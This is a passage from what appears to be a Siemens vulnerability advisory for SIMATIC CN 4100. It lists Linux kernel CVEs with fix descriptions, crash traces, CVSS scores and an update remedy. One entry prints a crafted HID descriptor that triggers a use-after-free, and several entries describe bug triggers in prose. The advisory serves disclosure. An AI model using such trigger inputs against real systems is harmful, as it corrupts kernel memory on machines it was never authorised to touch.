Capabilities cannot be inherited when we cross into a new filesystem. They need to be reset to the minimal defaults, and then probed for again.

Affected Products: Siemens SIMATIC. Vendor: Siemens. Product Version: SIMATIC CN 4100. Product Status: known_affected
Remediations: Vendor fix: Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-273 Improper Check for Dropped Privileges
Metrics: CVSS Version 3.1, Base Score 5.5, Base Severity MEDIUM, Vector String CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE-2025-39800
In the Linux kernel, the following vulnerability has been resolved:

btrfs: abort transaction on unexpected eb generation at btrfs_copy_root()

If we find an unexpected generation for the extent buffer we are cloning at btrfs_copy_root(), we just WARN_ON() and don't error out and abort the transaction, meaning we allow to persist metadata with an unexpected generation. Instead of warning only, abort the transaction and return -EUCLEAN.

Affected Products: Siemens SIMATIC. Vendor: Siemens. Product Version: SIMATIC CN 4100. Product Status: known_affected
Remediations: Vendor fix: Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-20 Improper Input Validation
Metrics: CVSS Version 3.1, Base Score 5.5, Base Severity MEDIUM, Vector String CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE-2025-39801
In the Linux kernel, the following vulnerability has been resolved:

usb: dwc3: Remove WARN_ON for device endpoint command timeouts

This commit addresses a rarely observed endpoint command timeout which causes kernel panic due to warn when 'panic_on_warn' is enabled and unnecessary call trace prints when 'panic_on_warn' is disabled. It is seen during fast software-controlled connect/disconnect testcases. The following is one such endpoint command timeout that we observed:

1. Connect
=======
->dwc3_thread_interrupt
->dwc3_ep0_interrupt
->configfs_composite_setup
->composite_setup
->usb_ep_queue
->dwc3_gadget_ep0_queue
->__dwc3_gadget_ep0_queue
->__dwc3_ep0_do_control_data
->dwc3_send_gadget_ep_cmd

2. Disconnect
==========
->dwc3_thread_interrupt
->dwc3_gadget_disconnect_interrupt
->dwc3_ep0_reset_state
->dwc3_ep0_end_control_data
->dwc3_send_gadget_ep_cmd

In the issue scenario, in Exynos platforms, we observed that control transfers for the previous connect have not yet been completed and end transfer command sent as a part of the disconnect sequence and processing of USB_ENDPOINT_HALT feature request from the host timeout. This may be an expected scenario since the controller is processing EP commands sent as a part of the previous connect. It may be better to remove WARN_ON in all places where device endpoint commands are sent to avoid unnecessary kernel panic due to warn.

Affected Products: Siemens SIMATIC. Vendor: Siemens. Product Version: SIMATIC CN 4100. Product Status: known_affected
Remediations: Vendor fix: Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-20 Improper Input Validation
Metrics: CVSS Version 3.1, Base Score 5.5, Base Severity MEDIUM, Vector String CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE-2025-39806
In the Linux kernel, the following vulnerability has been resolved:

HID: multitouch: fix slab out-of-bounds access in mt_report_fixup()

A malicious HID device can trigger a slab out-of-bounds during mt_report_fixup() by passing in report descriptor smaller than 607 bytes. mt_report_fixup() attempts to patch byte offset 607 of the descriptor with 0x25 by first checking if byte offset 607 is 0x15 however it lacks bounds checks to verify if the descriptor is big enough before conducting this check. Fix this bug by ensuring the descriptor size is at least 608 bytes before accessing it.
Below is the KASAN splat after the out of bounds access happens:

[ 13.671954] ==================================================================
[ 13.672667] BUG: KASAN: slab-out-of-bounds in mt_report_fixup+0x103/0x110
[ 13.673297] Read of size 1 at addr ffff888103df39df by task kworker/0:1/10
[ 13.673297]
[ 13.673297] CPU: 0 UID: 0 PID: 10 Comm: kworker/0:1 Not tainted 6.15.0-00005-gec5d573d83f4-dirty #3
[ 13.673297] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.2-debian-1.16.2-1 04/04
[ 13.673297] Call Trace:
[ 13.673297]
[ 13.673297] dump_stack_lvl+0x5f/0x80
[ 13.673297] print_report+0xd1/0x660
[ 13.673297] kasan_report+0xe5/0x120
[ 13.673297] __asan_report_load1_noabort+0x18/0x20
[ 13.673297] mt_report_fixup+0x103/0x110
[ 13.673297] hid_open_report+0x1ef/0x810
[ 13.673297] mt_probe+0x422/0x960
[ 13.673297] hid_device_probe+0x2e2/0x6f0
[ 13.673297] really_probe+0x1c6/0x6b0
[ 13.673297] __driver_probe_device+0x24f/0x310
[ 13.673297] driver_probe_device+0x4e/0x220
[ 13.673297] __device_attach_driver+0x169/0x320
[ 13.673297] bus_for_each_drv+0x11d/0x1b0
[ 13.673297] __device_attach+0x1b8/0x3e0
[ 13.673297] device_initial_probe+0x12/0x20
[ 13.673297] bus_probe_device+0x13d/0x180
[ 13.673297] device_add+0xe3a/0x1670
[ 13.673297] hid_add_device+0x31d/0xa40
[...]

Affected Products: Siemens SIMATIC. Vendor: Siemens. Product Version: SIMATIC CN 4100. Product Status: known_affected
Remediations: Vendor fix: Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-20 Improper Input Validation
Metrics: CVSS Version 3.1, Base Score 7, Base Severity HIGH, Vector String CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

CVE-2025-39808
In the Linux kernel, the following vulnerability has been resolved:

HID: hid-ntrig: fix unable to handle page fault in ntrig_report_version()

In ntrig_report_version(), hdev parameter passed from hid_probe().
Sending a descriptor to /dev/uhid can make hdev->dev.parent->parent NULL. If hdev->dev.parent->parent is NULL, usb_dev has the invalid address (0xffffffffffffff58) that hid_to_usb_dev(hdev) returned. When usb_rcvctrlpipe() uses usb_dev, it triggers a page fault error for address (0xffffffffffffff58).

Add NULL check logic to ntrig_report_version() before calling hid_to_usb_dev().

Affected Products: Siemens SIMATIC. Vendor: Siemens. Product Version: SIMATIC CN 4100. Product Status: known_affected
Remediations: Vendor fix: Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-20 Improper Input Validation
Metrics: CVSS Version 3.1, Base Score 5.5, Base Severity MEDIUM, Vector String CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE-2025-39812
In the Linux kernel, the following vulnerability has been resolved:

sctp: initialize more fields in sctp_v6_from_sk()

syzbot found that sin6_scope_id was not properly initialized, leading to undefined behavior. Clear sin6_scope_id and sin6_flowinfo.
BUG: KMSAN: uninit-value in __sctp_v6_cmp_addr+0x887/0x8c0 net/sctp/ipv6.c:649
__sctp_v6_cmp_addr+0x887/0x8c0 net/sctp/ipv6.c:649
sctp_inet6_cmp_addr+0x4f2/0x510 net/sctp/ipv6.c:983
sctp_bind_addr_conflict+0x22a/0x3b0 net/sctp/bind_addr.c:390
sctp_get_port_local+0x21eb/0x2440 net/sctp/socket.c:8452
sctp_get_port net/sctp/socket.c:8523 [inline]
sctp_listen_start net/sctp/socket.c:8567 [inline]
sctp_inet_listen+0x710/0xfd0 net/sctp/socket.c:8636
__sys_listen_socket net/socket.c:1912 [inline]
__sys_listen net/socket.c:1927 [inline]
__do_sys_listen net/socket.c:1932 [inline]
__se_sys_listen net/socket.c:1930 [inline]
__x64_sys_listen+0x343/0x4c0 net/socket.c:1930
x64_sys_call+0x271d/0x3e20 arch/x86/include/generated/asm/syscalls_64.h:51
do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]
do_syscall_64+0xd9/0x210 arch/x86/entry/syscall_64.c:94
entry_SYSCALL_64_after_hwframe+0x77/0x7f

Local variable addr.i.i created at:
sctp_get_port net/sctp/socket.c:8515 [inline]
sctp_listen_start net/sctp/socket.c:8567 [inline]
sctp_inet_listen+0x650/0xfd0 net/sctp/socket.c:8636
__sys_listen_socket net/socket.c:1912 [inline]
__sys_listen net/socket.c:1927 [inline]
__do_sys_listen net/socket.c:1932 [inline]
__se_sys_listen net/socket.c:1930 [inline]
__x64_sys_listen+0x343/0x4c0 net/socket.c:1930

Affected Products: Siemens SIMATIC. Vendor: Siemens. Product Version: SIMATIC CN 4100. Product Status: known_affected
Remediations: Vendor fix: Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-20 Improper Input Validation
Metrics: CVSS Version 3.1, Base Score 5.5, Base Severity MEDIUM, Vector String CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE-2025-39813
In the Linux kernel, the following vulnerability has been resolved:

ftrace: Fix potential warning in trace_printk_seq during ftrace_dump

When calling ftrace_dump_one() concurrently with reading trace_pipe, a WARN_ON_ONCE() in trace_printk_seq() can be triggered due to a
race condition.

The issue occurs because:

CPU0 (ftrace_dump) CPU1 (reader) echo z > /proc/sysrq-trigger !trace_empty(&iter) trace_iterator_reset(&iter) = s->seq.size)

In the context between trace_empty() and trace_find_next_entry_inc() during ftrace_dump, the ring buffer data was consumed by other readers. This caused trace_find_next_entry_inc to return NULL, failing to populate `iter.seq`. At this point, due to the prior trace_iterator_reset, both `iter.seq.len` and `iter.seq.size` were set to 0. Since they are equal, the WARN_ON_ONCE condition is triggered.

Move the trace_printk_seq() into the if block that checks to make sure the return value of trace_find_next_entry_inc() is non-NULL in ftrace_dump_one(), ensuring the 'iter.seq' is properly populated before subsequent operations.

Affected Products: Siemens SIMATIC. Vendor: Siemens. Product Version: SIMATIC CN 4100. Product Status: known_affected
Remediations: Vendor fix: Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-20 Improper Input Validation
Metrics: CVSS Version 3.1, Base Score 5.5, Base Severity MEDIUM, Vector String CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE-2025-39817
In the Linux kernel, the following vulnerability has been resolved:

efivarfs: Fix slab-out-of-bounds in efivarfs_d_compare

Observed on kernel 6.6 (present on master as well):

BUG: KASAN: slab-out-of-bounds in memcmp+0x98/0xd0
Call trace:
kasan_check_range+0xe8/0x190
__asan_loadN+0x1c/0x28
memcmp+0x98/0xd0
efivarfs_d_compare+0x68/0xd8
__d_lookup_rcu_op_compare+0x178/0x218
__d_lookup_rcu+0x1f8/0x228
d_alloc_parallel+0x150/0x648
lookup_open.isra.0+0x5f0/0x8d0
open_last_lookups+0x264/0x828
path_openat+0x130/0x3f8
do_filp_open+0x114/0x248
do_sys_openat2+0x340/0x3c0
__arm64_sys_openat+0x120/0x1a0

If dentry->d_name.len < EFI_VARIABLE_GUID_LEN, 'guid' can become negative, leading to oob.
The issue can be triggered by parallel lookups using invalid filename:

T1                                        T2
lookup_open
->lookup
simple_lookup
d_add
// invalid dentry is added to hash list
                                          lookup_open
                                          d_alloc_parallel
                                          __d_lookup_rcu
                                          __d_lookup_rcu_op_compare
                                          hlist_bl_for_each_entry_rcu
                                          // invalid dentry can be retrieved
                                          ->d_compare
                                          efivarfs_d_compare
                                          // oob

Fix it by checking 'guid' before cmp.

Affected Products: Siemens SIMATIC. Vendor: Siemens. Product Version: SIMATIC CN 4100. Product Status: known_affected
Remediations: Vendor fix: Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-20 Improper Input Validation
Metrics: CVSS Version 3.1, Base Score 7, Base Severity HIGH, Vector String CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

CVE-2025-39819
In the Linux kernel, the following vulnerability has been resolved:

fs/smb: Fix inconsistent refcnt update

A possible inconsistent update of refcount was identified in `smb2_compound_op`. Such inconsistent update could lead to possible resource leaks.

Why it is a possible bug:
1. In the comment section of the function, it clearly states that the reference to `cfile` should be dropped after calling this function.
2. Every control flow path would check and drop the reference to `cfile`, except the patched one.
3. Existing callers would not handle refcount update of `cfile` if -ENOMEM is returned.

To fix the bug, an extra goto label "out" is added, to make sure that the cleanup logic would always be respected. As the problem is caused by the allocation failure of `vars`, the cleanup logic between label "finished" and "out" can be safely ignored. According to the definition of function `is_replayable_error`, the error code of "-ENOMEM" is not recoverable. Therefore, the replay logic also gets ignored.

Affected Products: Siemens SIMATIC. Vendor: Siemens. Product Version: SIMATIC CN 4100. Product Status: known_affected
Remediations: Vendor fix: Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-20 Improper Input Validation
Metrics: CVSS Version 3.1, Base Score 5.5, Base Severity MEDIUM, Vector String CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE-2025-39823
In the Linux kernel, the following vulnerability has been resolved:

KVM: x86: use array_index_nospec with indices that come from guest

min and dest_id are guest-controlled indices. Using array_index_nospec() after the bounds checks clamps these values to mitigate speculative execution side-channels.

Affected Products: Siemens SIMATIC. Vendor: Siemens. Product Version: SIMATIC CN 4100. Product Status: known_affected
Remediations: Vendor fix: Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-20 Improper Input Validation
Metrics: CVSS Version 3.1, Base Score 7, Base Severity HIGH, Vector String CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

CVE-2025-39824
In the Linux kernel, the following vulnerability has been resolved:

HID: asus: fix UAF via HID_CLAIMED_INPUT validation

After hid_hw_start() is called hidinput_connect() will eventually be called to set up the device with the input layer since the HID_CONNECT_DEFAULT connect mask is used. During hidinput_connect() all input and output reports are processed and corresponding hid_inputs are allocated and configured via hidinput_configure_usages(). This process involves slot tagging report fields and configuring usages by setting relevant bits in the capability bitmaps. However it is possible that the capability bitmaps are not set at all leading to the subsequent hidinput_has_been_populated() check to fail leading to the freeing of the hid_input and the underlying input device.
This becomes problematic because a malicious HID device like an ASUS ROG N-Key keyboard can trigger the above scenario via a specially crafted descriptor which then leads to a use-after-free when the name of the freed input device is written to later on after hid_hw_start(). Below, report 93 intentionally utilises the HID_UP_UNDEFINED Usage Page which is skipped during usage configuration, leading to the frees.

0x05, 0x0D, // Usage Page (Digitizer)
0x09, 0x05, // Usage (Touch Pad)
0xA1, 0x01, // Collection (Application)
0x85, 0x0D, // Report ID (13)
0x06, 0x00, 0xFF, // Usage Page (Vendor Defined 0xFF00)
0x09, 0xC5, // Usage (0xC5)
0x15, 0x00, // Logical Minimum (0)
0x26, 0xFF, 0x00, // Logical Maximum (255)
0x75, 0x08, // Report Size (8)
0x95, 0x04, // Report Count (4)
0xB1, 0x02, // Feature (Data,Var,Abs)
0x85, 0x5D, // Report ID (93)
0x06, 0x00, 0x00, // Usage Page (Undefined)
0x09, 0x01, // Usage (0x01)
0x15, 0x00, // Logical Minimum (0)
0x26, 0xFF, 0x00, // Logical Maximum (255)
0x75, 0x08, // Report Size (8)
0x95, 0x1B, // Report Count (27)
0x81, 0x02, // Input (Data,Var,Abs)
0xC0, // End Collection

Below is the KASAN splat after triggering the UAF:

[ 21.672709] ==================================================================
[ 21.673700] BUG: KASAN: slab-use-after-free in asus_probe+0xeeb/0xf80
[ 21.673700] Write of size 8 at addr ffff88810a0ac000 by task kworker/1:2/54
[ 21.673700]
[ 21.673700] CPU: 1 UID: 0 PID: 54 Comm: kworker/1:2 Not tainted 6.16.0-rc4-g9773391cf4dd-dirty #36 PREEMPT(voluntary)
[ 21.673700] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.2-debian-1.16.2-1 04/01/2014
[ 21.673700] Call Trace:
[ 21.673700]
[ 21.673700] dump_stack_lvl+0x5f/0x80
[ 21.673700] print_report+0xd1/0x660
[ 21.673700] kasan_report+0xe5/0x120
[ 21.673700] __asan_report_store8_noabort+0x1b/0x30
[ 21.673700] asus_probe+0xeeb/0xf80
[ 21.673700] hid_device_probe+0x2ee/0x700
[ 21.673700] really_probe+0x1c6/0x6b0
[ 21.673700] __driver_probe_device+0x24f/0x310
[ 21.673700] driver_probe_device+0x4e/0x220
[...]
[ 21.673700]
[ 21.673700] Allocated by task 54:
[ 21.673700] kasan_save_stack+0x3d/0x60
[ 21.673700] kasan_save_track+0x18/0x40
[ 21.673700] kasan_save_alloc_info+0x3b/0x50
[ 21.673700] __kasan_kmalloc+0x9c/0xa0
[ 21.673700] __kmalloc_cache_noprof+0x139/0x340
[ 21.673700] input_allocate_device+0x44/0x370
[ 21.673700] hidinput_connect+0xcb6/0x2630
[ 21.673700] hid_connect+0xf74/0x1d60
[ 21.673700] hid_hw_start+0x8c/0x110
[ 21.673700] asus_probe+0x5a3/0xf80
[ 21.673700] hid_device_probe+0x2ee/0x700
[ 21.673700] really_probe+0x1c6/0x6b0
[ 21.673700] __driver_probe_device+0x24f/0x310
[ 21.673700] driver_probe_device+0x4e/0x220
[...]
[ 21.673700]
[ 21.673700] Freed by task 54:
[ 21.673700] kasan_save_stack+0x3d/0x60
[ 21.673700] kasan_save_track+0x18/0x40
[ 21.673700] kasan_save_free_info+0x3f/0x60
[ 21.673700] __kasan_slab_free+0x3c/0x50
[ 21.673700] kfre ---truncated---

Affected Products: Siemens SIMATIC. Vendor: Siemens. Product Version: SIMATIC CN 4100. Product Status: known_affected
Remediations: Vendor fix: Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-20 Improper Input Validation
Metrics: CVSS Version 3.1, Base Score 7, Base Severity HIGH, Vector String CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

CVE-2025-39825
In the Linux kernel, the following vulnerability has been resolved:

smb: client: fix race with concurrent opens in rename(2)

Besides sending the rename request to the server, the rename process also involves closing any deferred close, waiting for outstanding I/O to complete as well as marking all existing open handles as deleted to prevent them from deferring closes, which increases the race window for potential concurrent opens on the target file.

Fix this by unhashing the dentry in advance to prevent any concurrent opens on the target.

Affected Products: Siemens SIMATIC. Vendor: Siemens. Product Version: SIMATIC CN 4100. Product Status: known_affected
Remediations: Vendor fix: Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-20 Improper Input Validation
Metrics: CVSS Version 3.1, Base Score 7, Base Severity HIGH, Vector String CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

CVE-2025-39826
In the Linux kernel, the following vulnerability has been resolved:

net: rose: convert 'use' field to refcount_t

The 'use' field in struct rose_neigh is used as a reference counter but lacks atomicity. This can lead to race conditions where a rose_neigh structure is freed while still being referenced by other code paths.

For example, when rose_neigh->use becomes zero during an ioctl operation via rose_rt_ioctl(), the structure may be removed while its timer is still active, potentially causing use-after-free issues.

This patch changes the type of 'use' from unsigned short to refcount_t and updates all code paths to use rose_neigh_hold() and rose_neigh_put() which operate reference counts atomically.

Affected Products: Siemens SIMATIC. Vendor: Siemens. Product Version: SIMATIC CN 4100. Product Status: known_affected
Remediations: Vendor fix: Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-20 Improper Input Validation
Metrics: CVSS Version 3.1, Base Score 5.5, Base Severity MEDIUM, Vector String CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE-2025-39827
In the Linux kernel, the following vulnerability has been resolved:

net: rose: include node references in rose_neigh refcount

Current implementation maintains two separate reference counting mechanisms: the 'count' field in struct rose_neigh tracks references from rose_node structures, while the 'use' field (now refcount_t) tracks references from rose_sock.
This patch merges these two reference counting systems using 'use' field for proper reference management. Specifically, this patch adds incrementing and decrementing of rose_neigh->use when rose_neigh->count is incremented or decremented.

This patch also modifies rose_rt_free(), rose_rt_device_down() and rose_clear_route() to properly release references to rose_neigh objects before freeing a rose_node through rose_remove_node().

These changes ensure rose_neigh structures are properly freed only when all references, including those from rose_node structures, are released. As a result, this resolves a slab-use-after-free issue reported by Syzbot.

Affected Products: Siemens SIMATIC (Vendor: Siemens; Product Version: SIMATIC CN 4100; Product Status: known_affected)
Remediations: Vendor fix: Update to V5.0 or later version (https://support.industry.siemens.com/cs/ww/en/view/109814144/)
Relevant CWE: CWE-20 Improper Input Validation
Metrics: CVSS Version 3.1; Base Score 5.5; Base Severity MEDIUM; Vector String CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE-2025-39828
In the Linux kernel, the following vulnerability has been resolved:

atm: atmtcp: Prevent arbitrary write in atmtcp_recv_control().

syzbot reported the splat below. [0]

When atmtcp_v_open() or atmtcp_v_close() is called via connect() or close(), atmtcp_send_control() is called to send an in-kernel special message.

The message has ATMTCP_HDR_MAGIC in atmtcp_control.hdr.length. Also, a pointer of struct atm_vcc is set to atmtcp_control.vcc.

The notable thing is struct atmtcp_control is uAPI but has a space for an in-kernel pointer.

    struct atmtcp_control {
        struct atmtcp_hdr hdr;  /* must be first */
    ...
        atm_kptr_t vcc;         /* both directions */
    ...
    } __ATM_API_ALIGN;

    typedef struct { unsigned char _[8]; } __ATM_API_ALIGN atm_kptr_t;

The special message is processed in atmtcp_recv_control() called from atmtcp_c_send().

atmtcp_c_send() is vcc->dev->ops->send() and called from 2 paths:

  1. .ndo_start_xmit() (vcc->send() == atm_send_aal0())
  2. vcc_sendmsg()

The problem is sendmsg() does not validate the message length and userspace can abuse atmtcp_recv_control() to overwrite any kptr by atmtcp_control.

Let's add a new ->pre_send() hook to validate messages from sendmsg().
Affected Products: Siemens SIMATIC (Vendor: Siemens; Product Version: SIMATIC CN 4100; Product Status: known_affected)
Remediations: Vendor fix: Update to V5.0 or later version (https://support.industry.siemens.com/cs/ww/en/view/109814144/)
Relevant CWE: CWE-20 Improper Input Validation
Metrics: CVSS Version 3.1; Base Score 7; Base Severity HIGH; Vector String CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

CVE-2025-39835
In the Linux kernel, the following vulnerability has been resolved:

xfs: do not propagate ENODATA disk errors into xattr code

ENODATA (aka ENOATTR) has a very specific meaning in the xfs xattr code; namely, that the requested attribute name could not be found.

However, a medium error from disk may also return ENODATA. At best, this medium error may escape to userspace as "attribute not found" when in fact it's an IO (disk) error.

At worst, we may oops in xfs_attr_leaf_get() when we do:

    error = xfs_attr_leaf_hasname(args, &bp);
    if (error == -ENOATTR) {
        xfs_trans_brelse(args->trans, bp);
        return error;
    }

because an ENODATA/ENOATTR error from disk leaves us with a null bp, and the xfs_trans_brelse will then null-deref it.
As discussed on the list, we really need to modify the lower level IO functions to trap all disk errors and ensure that we don't let unique errors like this leak up into higher xfs functions - many like this should be remapped to EIO.

However, this patch directly addresses a reported bug in the xattr code, and should be safe to backport to stable kernels. A larger-scope patch to handle more unique errors at lower levels can follow later.

(Note, prior to 07120f1abdff we did not oops, but we did return the wrong error code to userspace.)

Affected Products: Siemens SIMATIC (Vendor: Siemens; Product Version: SIMATIC CN 4100; Product Status: known_affected)
Remediations: Vendor fix: Update to V5.0 or later version (https://support.industry.siemens.com/cs/ww/en/view/109814144/)
Relevant CWE: CWE-20 Improper Input Validation
Metrics: CVSS Version 3.1; Base Score 5.5; Base Severity MEDIUM; Vector String CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE-2025-39838
In the Linux kernel, the following vulnerability has been resolved:

cifs: prevent NULL pointer dereference in UTF16 conversion

There can be a NULL pointer dereference bug here. NULL is passed to __cifs_sfu_make_node without checks, which passes it unchecked to cifs_strndup_to_utf16, which in turn passes it to cifs_local_to_utf16_bytes where '*from' is dereferenced, causing a crash.

This patch adds a check for NULL 'src' in cifs_strndup_to_utf16 and returns NULL early to prevent dereferencing NULL pointer.
Found by Linux Verification Center (linuxtesting.org) with SVACE

Affected Products: Siemens SIMATIC (Vendor: Siemens; Product Version: SIMATIC CN 4100; Product Status: known_affected)
Remediations: Vendor fix: Update to V5.0 or later version (https://support.industry.siemens.com/cs/ww/en/view/109814144/)
Relevant CWE: CWE-20 Improper Input Validation
Metrics: CVSS Version 3.1; Base Score 7; Base Severity HIGH; Vector String CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

CVE-2025-39839
In the Linux kernel, the following vulnerability has been resolved:

batman-adv: fix OOB read/write in network-coding decode

batadv_nc_skb_decode_packet() trusts coded_len and checks only against skb->len. XOR starts at sizeof(struct batadv_unicast_packet), reducing payload headroom, and the source skb length is not verified, allowing an out-of-bounds read and a small out-of-bounds write.

Validate that coded_len fits within the payload area of both destination and source sk_buffs before XORing.

Affected Products: Siemens SIMATIC (Vendor: Siemens; Product Version: SIMATIC CN 4100; Product Status: known_affected)
Remediations: Vendor fix: Update to V5.0 or later version (https://support.industry.siemens.com/cs/ww/en/view/109814144/)
Relevant CWE: CWE-20 Improper Input Validation
Metrics: CVSS Version 3.1; Base Score 5.5; Base Severity MEDIUM; Vector String CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE-2025-39841
In the Linux kernel, the following vulnerability has been resolved:

scsi: lpfc: Fix buffer free/clear order in deferred receive path

Fix a use-after-free window by correcting the buffer release sequence in the deferred receive path. The code freed the RQ buffer first and only then cleared the context pointer under the lock. Concurrent paths (e.g., ABTS and the repost path) also inspect and release the same pointer under the lock, so the old order could lead to double-free/UAF.
Note that the repost path already uses the correct pattern: detach the pointer under the lock, then free it after dropping the lock. The deferred path should do the same.

Affected Products: Siemens SIMATIC (Vendor: Siemens; Product Version: SIMATIC CN 4100; Product Status: known_affected)
Remediations: Vendor fix: Update to V5.0 or later version (https://support.industry.siemens.com/cs/ww/en/view/109814144/)
Relevant CWE: CWE-20 Improper Input Validation
Metrics: CVSS Version 3.1; Base Score 7.8; Base Severity HIGH; Vector String CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CVE-2025-39842
In the Linux kernel, the following vulnerability has been resolved:

ocfs2: prevent release journal inode after journal shutdown

Before calling ocfs2_delete_osb(), ocfs2_journal_shutdown() has already been executed in ocfs2_dismount_volume(), so osb->journal must be NULL. Therefore, the following calltrace will inevitably fail when it reaches jbd2_journal_release_jbd_inode().

    ocfs2_dismount_volume()->
      ocfs2_delete_osb()->
        ocfs2_free_slot_info()->
          __ocfs2_free_slot_info()->
            evict()->
              ocfs2_evict_inode()->
                ocfs2_clear_inode()->
                  jbd2_journal_release_jbd_inode(osb->journal->j_journal,

Adding osb->journal checks will prevent null-ptr-deref during the above execution path.

Affected Products: Siemens SIMATIC (Vendor: Siemens; Product Version: SIMATIC CN 4100; Product Status: known_affected)
Remediations: Vendor fix: Update to V5.0 or later version (https://support.industry.siemens.com/cs/ww/en/view/109814144/)
Relevant CWE: CWE-20 Improper Input Validation
Metrics: CVSS Version 3.1; Base Score 5.5; Base Severity MEDIUM; Vector String CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE-2025-39843
In the Linux kernel, the following vulnerability has been resolved:

mm: slub: avoid wake up kswapd in set_track_prepare

set_track_prepare() can incur lock recursion.
The issue is that it is called from hrtimer_start_range_ns holding the per_cpu(hrtimer_bases)[n].lock, but when enabled CONFIG_DEBUG_OBJECTS_TIMERS, may wake up kswapd in set_track_prepare, and try to hold the per_cpu(hrtimer_bases)[n].lock.

Avoid deadlock caused by implicitly waking up kswapd by passing in allocation flags, which do not contain __GFP_KSWAPD_RECLAIM in the debug_objects_fill_pool() case. Inside stack depot they are processed by gfp_nested_mask(). Since ___slab_alloc() has preemption disabled, we mask out __GFP_DIRECT_RECLAIM from the flags there.

The oops looks something like:

    BUG: spinlock recursion on CPU#3, swapper/3/0
     lock: 0xffffff8a4bf29c80, .magic: dead4ead, .owner: swapper/3/0, .owner_cpu: 3
    Hardware name: Qualcomm Technologies, Inc. Popsicle based on SM8850 (DT)
    Call trace:
     spin_bug+0x0
     _raw_spin_lock_irqsave+0x80
     hrtimer_try_to_cancel+0x94
     task_contending+0x10c
     enqueue_dl_entity+0x2a4
     dl_server_start+0x74
     enqueue_task_fair+0x568
     enqueue_task+0xac
     do_activate_task+0x14c
     ttwu_do_activate+0xcc
     try_to_wake_up+0x6c8
     default_wake_function+0x20
     autoremove_wake_function+0x1c
     __wake_up+0xac
     wakeup_kswapd+0x19c
     wake_all_kswapds+0x78
     __alloc_pages_slowpath+0x1ac
     __alloc_pages_noprof+0x298
     stack_depot_save_flags+0x6b0
     stack_depot_save+0x14
     set_track_prepare+0x5c
     ___slab_alloc+0xccc
     __kmalloc_cache_noprof+0x470
     __set_page_owner+0x2bc
     post_alloc_hook[jt]+0x1b8
     prep_new_page+0x28
     get_page_from_freelist+0x1edc
     __alloc_pages_noprof+0x13c
     alloc_slab_page+0x244
     allocate_slab+0x7c
     ___slab_alloc+0x8e8
     kmem_cache_alloc_noprof+0x450
     debug_objects_fill_pool+0x22c
     debug_object_activate+0x40
     enqueue_hrtimer[jt]+0xdc
     hrtimer_start_range_ns+0x5f8
     ...
Affected Products: Siemens SIMATIC (Vendor: Siemens; Product Version: SIMATIC CN 4100; Product Status: known_affected)
Remediations: Vendor fix: Update to V5.0 or later version (https://support.industry.siemens.com/cs/ww/en/view/109814144/)
Relevant CWE: CWE-20 Improper Input Validation
Metrics: CVSS Version 3.1; Base Score 7; Base Severity HIGH; Vector String CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

CVE-2025-39844
In the Linux kernel, the following vulnerability has been resolved:

mm: move page table sync declarations to linux/pgtable.h

During our internal testing, we started observing intermittent boot failures when the machine uses 4-level paging and has a large amount of persistent memory:

    BUG: unable to handle page fault for address: ffffe70000000034
    #PF: supervisor write access in kernel mode
    #PF: error_code(0x0002) - not-present page
    PGD 0 P4D 0
    Oops: 0002 [#1] SMP NOPTI
    RIP: 0010:__init_single_page+0x9/0x6d
    Call Trace:
     __init_zone_device_page+0x17/0x5d
     memmap_init_zone_device+0x154/0x1bb
     pagemap_range+0x2e0/0x40f
     memremap_pages+0x10b/0x2f0
